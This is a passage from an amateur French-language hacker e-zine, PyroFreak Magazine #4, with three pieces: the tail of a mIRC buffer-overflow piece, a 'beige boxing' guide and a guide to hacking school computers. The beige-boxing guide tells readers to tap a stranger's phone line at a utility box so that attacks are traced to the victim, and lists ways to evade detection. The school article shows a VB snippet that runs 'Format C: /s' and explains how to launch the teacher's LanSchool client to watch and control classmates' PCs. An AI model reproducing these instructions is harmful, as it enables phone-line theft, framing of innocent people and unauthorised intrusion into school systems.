c est comme baisser et sarreter apres 2 sec c plate! bon au moin avez vous compris 
pkoi mirc5.3x plante?? reponse buffer overflow yen peu pû la le prog fake kosse 
ki fa vu que le programmeur a pas son On erreur resume next hein hein hein nenon 
sa po rap avec on eror resume next la lol non mais le prog crash sa plante yen 
peut pu! bon c simple hein!

bon ce bug est tres vieux et aussi tres lame techniquement parlant! jai ecrit uen 
source parce que sa me tentais decrire dans PyroPhreak #4 lol pis javais rien 
affair eje me dit que sa peut etre ointerresant de savoir comment marche un buffer 
overflow alors dite vous que cette technique pourrait etre peut etre utiliser 
contre dautre prog example quand vous voyez sur rootshell tell prog buffer overflow 
(mais sa depend de kel buffer overflow) essaer sa vs lautre prog en chngenat le 
port 113 par le port que l app utilise je garenti pas pas le succes mais bon!! c 
pomal sa la! C est seulement une facon mais bon ya plusisuer faconn de parvenir a ces fins!! 

ok tu me dit que sa marche pas!
bon javais oublier de dir sa marche jsute sur les mirc5.3x qui on ident server enable! 
(yen a bcp)

ensuite sa mache po plus!!
a la tayeule arrete de machaler!!



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Beige Boxing
'.________ __ __ ___________ ____ ____________ _____Par Endrix ___ _



==============================
Umpeu plus sur le Beige Boxing
==============================


Avant propos :
--------------

CECI PEUT ÊTRE TRÈS DANGEUREUX, JE NE VOUS FORCE PAS A FAIRE AUCUNE DES
CHOSES ET EST DIT DANS CE TEXTE, JE NE FAIT QUE VOUS INFORMER C'EST
TOUT. ALOS SI VOUS VOUS FAITES ÉLECTROCUTER EN FAISANT CELA, C'EST PAS
DE MA FAUTE J'AI DIT CE QUE J'AVAIS À DIRE ALORS MAINTENANT LA SEULE
PERSONNE QUI PEUT ÊTER DANS LE TORD EST VOUS MÊME !!!

MERCI, 
endrix


Comment ca marche :
-------------------

Le Beige Boxing sert à se connecter à une ligne qui n'est pas la votre
pour pouvoir connecter et faire vos choses sans que ce soit de chez
vous. Donc pour se faire, vous aurez besoin de trouver quelques
victimes vulnérables à ce genre d'attaque(une facon de dire les 
choses, hehe) et je vous souhaite de prendre des vistimes qui sont pas
très riche comme ca souvent la centrale(Bell) va prendre beaucoup plus
de temps a réagir a cela mais si la personne est riche, quand tu as de 
l'argent, tout va plus vite et mieu :)

Je tiens a dire que cette box est sourtout bonne en France MAIS elle
fonctionne au Québec aussi !!! Je sais, je l'ai essayer avec des amis
l'autre jour


Matériels :
-----------

- Un téléphone a quadran numérique
- 3 Pinces crocodiles
- Un fer a couder
- Tourne-Vis
- Couteau
- SaC à dos(de préférence, voir plus loin pour plus d'info)


Fabrication de la boite :
-------------------------


1 - Prendre le téléhone, et le démonter doucement avec le tourne-vis
    de facon d'avoir access à l'intérieur mais il faut pouvoir le remonter :)

Notes : Vous allez voir 4 fils : Bleu, Blanc, Rouge et Jaune
¯¯¯¯¯¯¯

2 - Prendre une pince pour chaque fils et le saouder dessus

Notes : Dégeiner le fil avant de faire ca avec le couteau
¯¯¯¯¯¯¯

3 - Maintenant, aller vous trouvez une victime. Ceci peut être umpeu dûr 
    parce que dite vous qu'il va falloir que vous alliez monter dans le poteau
    de Bell ou les lignes de téléphones et ou vous allez pouvoir voir la boîte
    anti-foudre(FT). Pour les reconnaitres, c'est pas très dûr, c'est une boite
    Blanche qui a une insigne "FT".

Extras : Quand vous allez avoir ouvert la boite, vous allez voir plusieurs fils
¯¯¯¯¯¯¯¯ donc 2, le fil blanc et le fil gris. Maintenant, il faut les dénuders sans
         les coupers(IMPORTANT!!!!!!!!) Maintenant ils faut brancher la pince blanche
         sur le fil blanc et la pince rouge sur le fil gris. Décrochez le téléphone, 
         vous avez le tone ???? Si oui... YESSSsssSSS !!! Sinon, choisissez un autre fil
         blanc et un autre fil gris. 

Bon alors maintenant, vous savez ce que vous avez a faire, si vous voullez mettre
cette personne dans la merde, vous avez juste à redessendre et brancher votre portable
sur le fil et faire une petite attaque sur un serveur..... :))))


Comment ne pas se faire prendre :
---------------------------------

1 - Ne pas trop endomager la boite après utilisation
2 - Ne pas faire trop de bruit
3 - Passer à l'action après minuit
4 - Ne pas choisir une personne qui vous connais
5 - Je suis sûr que vous en savez d'autres..


Conclusion :
------------

Bon hey bien j'espère que vous allez vous amusez avec tout ca :)

Ne vous faites pas prendre les enfants!!

- endrix



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Hacking sur les ordis de l'école 
'.________ __ __ ___________ ____ ____________ ____Par CyberRider __



Bon dan cette article je vous explique comment hacker votre école ! bon faut
sentendre la on changera pas nos notes je vous dis seulement style avoir des
acces de prof bon avoir accces aux autre ordi des chose du genre tsé! Bon
pour commencer je vais vous dir a ecole je suis pis la commision scolaire car
la commision scolaire doit etre baser sur sa au complet tk! on sen fou bon!
ok jai rediger cette article a partir du locla 204-c ou b tk peut importe de
lecole la courvilloise euh de la commision scolaire des premeire seigneurie
donc pomal toute les autre ecole de cette commision doit marcher aec les meme
programme mais bon la je le fait sur la courvi c simple!!

Premier Tips & Tricks! (win95/98)

Quand vous etes dans lordi de lecole vous avez que 3 choix dans le menu
demarrer program aide et rechercher vous avez pas le executer! zute on peut
pa chier grand chose vous vous dites! vous vous trompez!! ouvrez le plus gros
prog de hack au monde qui est a dir paint brush! lol bon vous aller dans
ouvrir tu fait tous *.* et tu va au repertoir ou se situe le fichier que tu
veut ouvrir! tu selectionne el fichier et tu click dessus avec lautre piton
la ta propriété et plein d autre truc don le premeir de la liste qui est
Ouvrir ;) alors tu tu selectionne le ouvrir et sa va partir le programme ;))
c cool hein! Paint brush est util enfin ;)))


Deuxieme Tips & Tricks!

Tu est sous win 3.1 et tu veut faire la meme chose qu au type #1 ta pas
executer bon bon bon ta un ta 3 choix mais qui soffre pas a tous le monde
désoler!! tu as VB3 sur le win 3.1 se qui serait cool! ou ta une icon qui
execute un .bat a kekpart! ou bien ta microsoft acces! Bon si ta vb fait toi
ton propre executer c simple :

sub execute ()
Dim prog
Dim x
Prog = "Format C: /s"
x = Shell (prog, 1)
End Sub

ok Stai tres simple sa! mais bon fait pas de formatte c : la quand meme!!
ensuite tu as pas vb3 mais ya une icon a kekpart qui execute un .bat cherchez
c est sur qui en a surment une!! alors tu trouve le .bat qui se fait executer
et tu va le modifier avec notepad et tu rentre le path et le fichier et up
quand tu clcik sur licon sa execute ton bat et ton prog du emem coup ;))

Ok maintenant ta pas vb3 ni de .bat mais tu a microsoft access hmm c cool sa
peut etre tres simpel ;)) ouvre le fait toi une nouvelle base de doné la tu
fait un fromulaire vierge c simple et ensuite tu met un boutton sa va touvrir
un assitant la tu chercher dans les choix de boutton et tu remakr qui yen a
un que cest executer une application tu selectionne sa tu donne le path de
ton app et up run ton formulaire pese sur ton boutton et le tour est jouer!!!


Bon ok c est fini pour les type n tricks pkoi je vous explique comment
executer des app sur des ordi qui ne peuvent pas c simple faut bin ouvrir des
fichier quon a pas acces! hein ;)) alors bon maintenant quon est a la courvi
on sais que notre proff a lanschool qui fait toujours planter nos pc sérieux
ya rien de plus chiant que le prof qui part le broadcasting et nous explique
des chose quon sais tsé! bont k la on sais qui a sa alors on sais qui a un
client pour les eleves et un client pour els prof qui nous font chier bon!
Mais techniquement les prof sont pas fou ilss vont emttre le programm lan
school sur leur server principal (à la courvi ya 2 server principal dison
jcrois yen a plus mais bon! ya Courv_Apo1 et Courv_Apo2 le 1 cest win 3.1 et
le 2 win95!) bon sur le server rpincipal nos ordi en se laodant ouvree le
prog Wstudent.exe qui est le lanschool pour les eleve qui permet au prof
daller voir tous ha les maudit mais techniquement encor si on a pu laoder
Wstudent.exe donc on a acces au repertoire de lanschool et puis si il
linstall seulement sur un srerver c car ya le client prof sur le meme rep !!
Vous aller me dir non! bin moi je repond oui c con mais oui Wteacher.exe est
dans le meme rep donc si on fait un tips n tricks et quon rouvre le fichier
win.ini i doit avoir des ligne au debut qui ressemble a sa!


[windows]
load=
run=\\Courv_apo2\lepaht de merde a la con de lanschool\Wstudent.exe
NullPort=None
device=EPSON Stylus COLOR 400,EPS400,LPT2: 


donc la on pogne le path de lanschool c pas bete hein!bon une fois quon a le
path de lanschool que voulez vous faire bon on peut toujours changer le
win.ini et marker Wteacher.exe a place mais tous les autre user apres aurons
droit a lanschool pour les prof non on veut pas etre 10 a lavoir on veut etre
le seul elite a rire de tous le monde!! donc on va dans paintbrush et on tape
sa!
//courv_apo2\le path de lanschool a lacon\
enter
la on est dans le rep de lanschool up ;) on fait afficher tous les fichier!
et on voie Wteacher.exe hmm je me demande ske c ?? hehehehe alors on louvre a
la technique tips n tricks #1 lol et on optient le lanschoodes prof !! il
souvre sur la bar de tache et on peu le controler en clickant dessus sur
lautre boutton on voit view student Broadcasting etc... bon broadcasting tous
les eleve vont voir votre ecran donc! on touche pas tu suite view hmm
interressant la on ouvre sa la sa fait un decompte de 100 poste et + et sa
trouve tous les poste docn unc oup que cest fini on a obtenu tous le spsote
alors onc heck les numero des poste et on voit ski font on peut aussi faire
ski font a leur place lol genre yecrive un text toi tu pese sur backspace des
truc du genre aller sur demarrer fermer lordi entk mais le suel prob que jai
trouver cest que a courvi toute les poste sappelait elev204 sa va bin tsé!!
imagine sont sous win95 quekun amen un nuke sur une diskette (un lamerz
binsur) la lui y veut nuker kekun i mark a palce du ip elev204 ouch me
demande ske sa ferais probablement nuker tous les elev204 hehehehe entk!! c
pomla sa pour le hacking des ecole et de la courvie!!

bon vous ske vous voulez c avoir tous les item dans le menu demarrer ok 
ouvrez le system.ini euh descendez ici:

[boot]
system.drv=system.drv
drivers=mmsystem.dll power.drv
user.exe=user.exe
gdi.exe=gdi.exe
sound.drv=mmsound.drv
dibeng.drv=dibeng.dll
comm.drv=comm.drv
shell=Explorer.exe
keyboard.drv=keyboard.drv
fonts.fon=vgasys.fon
fixedfon.fon=vgafix.fon
oemfonts.fon=vga850.fon
386Grabber=vgafull.3gr
display.drv=pnpdrvr.drv
mouse.drv=mouse.drv
*DisplayFallback=0

vous voyez a shell c marker explorer.exe bon sur le mien c explorer.exe mais
sur les ecole sa peut etre autre chose ou bin y peut avoir des command line
en arriere alors arrenger vous pour marker explorer.exe ou aller marker
\\courv_apo\c\windows\explorer.exe comme sa vous etes sur davoir le meme
shell que votre prof ;)) bon entk si sa amrche pas et tout et tous bin c
jsute des test pendant 75 minute que jai donc 20 minute que je tapais un text
alors jai pas euh le temp de checker plus de possibiliter de hack sur les pc
de elcole désoler il y aura probeblement une belle suite!!

Tous les truck de cette article vienne de moi jai est trouver en aillant
rien a faire et a force de gosser tk take care , keep hacking and have phun
with your school!!

cYBERrIDER



========================================================================
Conclusion
¯¯¯¯¯¯¯¯¯¯

Hey bien voici encore un autre ezine qui vient de ce terminer!!! J'espère
que vous l'avez aimer la :)

L'été est arrivé, enfin!! Alors la c'est le temps de faire autre chose que
de rester en face de vos écrans, profiter de la vie, fêter en masse faite toute
les choses que vous ne pouvez pas faire en temps normal, c'est le temps. La crew
de pyrofreak allons cesser nos activités durant cet été pour profiter de la vie
en tant que jeune mais vous pouvez toujours nous contacter par courrier électronique
alors j'espère que vous allez passer un bel été et faites attention avec vous parce
qu'en revenant, le meilleur s'en vient !!!!!!!!!!

- endrix[paroles du groupe]
========================================================================







	                                     _   _
                         	      	'::-::`
    	       	                         (o o)    	
                                       ooO--(_)--Ooo-
            cOPYRIGHT (c) tOUT lES dROITS rÉSERVÉS à pYRO-pHREAKERS mAGAZINE
